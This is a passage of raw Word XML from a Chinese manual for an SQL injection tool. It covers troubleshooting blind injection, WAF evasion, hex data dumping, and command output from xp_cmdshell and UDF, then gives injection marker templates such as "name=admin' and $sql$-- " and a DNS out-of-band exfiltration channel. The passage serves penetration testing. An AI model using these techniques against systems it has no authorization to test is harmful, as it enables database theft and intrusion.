        <w:t xml:space="preserve"> 收窄数据库类型 + 穷举模式；④ 看「请求日志」响应是否被 WAF 拦截，是则配置编码处理 / 字符替换 / 随机 UA / 延时；⑤ 页面噪声大时确认 Bool 盲注走相似度判断（默认开启）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A86974">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Q2：盲注太慢？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>① 确认非 WAF 限速；② 提高线程数；③ 用报错 / Union / DNS 外带替代（检测时多类型命中可任选通道）；④ 智能预测（n-gram 字符预测、值缓存）默认已开启。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E2198">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Q3：dump 中文乱码？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">勾选中文识别（CLI 加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>），数据按 hex 取出后本地解码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100AD62">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Q4：命令执行结果带多余空行？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>已做通道输出净化（剥离 UDF / xp_cmdshell 产生的前导换行），若仍有个别残留，属目标环境回显差异，不影响内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C551F4C">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Q5：时间盲注误判 / 漏判？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>网络抖动大时，把判定阈值调高（通道配置 - 时间盲注）；由注入记录恢复的配置会自动带出检测时的实测延时值，一般无需手调。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9B20E">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Q6：config 目录被删 / 损坏？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">取数模板、检测用例、字典均从 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加载，删除后功能不可用；从发布包重新拷贝该目录即可恢复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1875A98E">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>Q7：GUI 和 CLI 结论不一致？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>两者共用引擎与配置，正常应一致；检查 CLI 工作目录是否为二进制所在目录、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是否齐全。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E8B56A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>附录：注入标记契约（自动记录与手工标记一套机制）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0970795C">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>检测引擎产出的注入记录，其重烘焙后的请求报文本身就是一份合法的手工标记报文——自动记录与手工标记走的是同一条取数管线。理解这套契约后，既可以完全脱离自动检测、手工标记注入点直接取数，也可以把自动记录当作模板继续手工修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786B02FA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>A.1 统一标记形态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E78CD2">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>标记后的请求参数形如（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$sql$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 为取数 SQL 槽位）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B85B92">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>· MySQL 数字型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id=1&lt;Encode&gt; and $sql$#&lt;/Encode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A449B6">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>· SQLServer 单引号型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>name=admin&lt;Encode&gt;' and $sql$-- &lt;/Encode&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A161A1C">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>规律：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">基底值（原参数值）留在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;Encode&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 块之外；boundary 前后缀、and 胶水、数据库注释放在块内。取数时仅块内内容参与编码拼接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4F84E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>A.2 取数硬校验（EnsureDataOpReady）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2702E3A2">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$sql$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 全报文必须唯一；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202F77D4">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">② </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$sql$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 必须落在某个 &lt;Encode&gt; 块内，裸标记会被拦截并弹窗提示；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5488C43A">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>数据库类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已识别（通道配置页选择或记录带出）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEAAE3C">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>注入类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已选择；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69318B9C">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⑤ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>盲注类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>（Bool/时间）需判断值，可用「查找判断值」按钮自动探测；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA7C930">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⑥ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DNS 通道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 需配置 DNSLog 域名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C85B70">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>A.3 自动记录 = 自动生成手工标记</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B3694E">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>恢复注入记录时，引擎按结构化字段（Prefix / Suffix / Where / DBType / VectorTemplate / OrigValue / Place）重烘焙报文并写回编辑器，之后与手工标记走完全相同的管线：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>StrReplace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 按块位置推断编码方式 → 拼接 tamper 链 → 兜底 URL 编码。重烘焙结果可继续手工编辑，不受任何限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B6E97C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>A.4 自动记录与手工标记对照</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3249"/>
        <w:gridCol w:w="3249"/>
        <w:gridCol w:w="3249"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="09BCEDEE">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>环节</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="537D6168">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>自动记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="51E489AC">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>手工标记</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="40723FB2">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>报文标记</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="064D5B4A">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>恢复记录时按结构化字段重烘焙写入编辑器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="536141C0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>在请求报文中手插 &lt;Encode&gt; 块与 $sql$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="6E81669A">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>库类型 / 注入类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="2E9D733A">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>记录自动带出</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="58C634DA">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>通道配置页手工选择</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="50D7CF72">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>判断值 / Union 列数显示位</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="204C14AC">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>记录带出，可用「查找判断值」重新探测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="6E304672">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>手填或点「查找判断值」自动探测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="70CDE6D8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>base64 参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="3CB48F24">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>命中点自动启用内置 base64encode 工具，记录显示带 · base64 后缀</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="20AF2AA0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>基底值并入 &lt;Encode&gt; 块内 + 编码处理页手动启用 base64encode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="506B176C"/>
    <w:p w14:paraId="29067A94">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>A.5 通道配置是另一半</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192A24E">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>报文标记解决“往哪注”，通道配置（库类型 / 注入类型 / 判断值 / Union 列数与显示位）解决“怎么判”。自动记录恢复时两者一并带出；手工标记时需在通道配置页补齐，缺一不可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498DBDD2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>A.6 base64 参数的特殊形态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97212C">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">参数整体按 base64 传输时，基底值并入块内，例如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>q=&lt;Encode&gt;1 and $sql$#&lt;/Encode&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">，整个块（含基值与注入语句）编码后放入参数；同时启用内置 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>base64encode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 编码工具。语义等价于 sqlmap 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19813D6E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>A.7 where=3 参数替换点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5160FA">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>自动记录用 vector 模板保存替换点（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[INFERENCE]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[QUERY]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 槽位在恢复时替换为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$sql$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>）；手工标记按同一模板书写即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47706FCE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>A.8 现行标记总表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3249"/>
        <w:gridCol w:w="3249"/>
        <w:gridCol w:w="3249"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="4C20CA78">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>标记</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="61407D82">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>性质</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="437CEAB8">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>含义</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="68C8DCDE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt;Encode&gt;…&lt;/Encode&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="0A493C9C">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>用户标记</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="7C4E6962">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>注入编码块：$sql$ 必须落在其中；按块位置推断编码后接 tamper 链，兜底 URL 编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3249"/>
          </w:tcPr>
          <w:p w14:paraId="05C6770C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="20"/>
              </w:rPr>
